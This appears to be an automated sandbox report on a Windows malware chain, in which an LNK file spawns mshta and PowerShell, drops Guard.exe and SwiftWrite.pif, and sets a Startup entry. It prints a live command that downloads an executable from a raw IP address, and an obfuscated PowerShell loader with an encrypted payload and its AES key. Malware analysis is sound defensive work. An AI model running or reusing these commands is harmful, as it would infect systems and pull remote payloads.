Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.2403876384.0000022B39828000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2402966513.0000022B39898000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419400700.0000022B3EE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404362707.0000022B3EE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404539888.0000022B3EE67000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F1117381739EC36C7AC7F333B3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetStringJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D47634 LoadLibraryA,GetProcAddress,19_2_00007FF656D47634
Source: FILEANH[1].4.drStatic PE information: real checksum: 0x5f0d should be: 0x20b35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD32C02365 push eax; iretd 8_2_00007FFD32C0237D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD32C000BD pushad ; iretd 8_2_00007FFD32C000C1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CE78FD push rdi; ret 19_2_00007FF656CE7904
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CE7399 push rdi; ret 19_2_00007FF656CE73A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD32BE00BD pushad ; iretd 28_2_00007FFD32BE00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD32CB06E5 push es; retf 28_2_00007FFD32CB06F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD32CB0635 push es; retf 28_2_00007FFD32CB0642
Source: C:\Users\Public\Guard.exeCode function: 30_2_00378B75 push ecx; ret 30_2_00378B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B08B75 push ecx; ret 35_2_00B08B88

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Drops PE files with a suspicious file extension
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FILEANH[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\PefjSkkhb.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FILEANH[1]Jump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD4514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_00007FF656CD4514
Source: C:\Users\Public\Guard.exeCode function: 30_2_003D59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,30_2_003D59B3
Source: C:\Users\Public\Guard.exeCode function: 30_2_00365EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,30_2_00365EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,35_2_00B659B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AF5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,35_2_00AF5EDA
Source: C:\Users\Public\Guard.exeCode function: 30_2_003733B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,30_2_003733B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
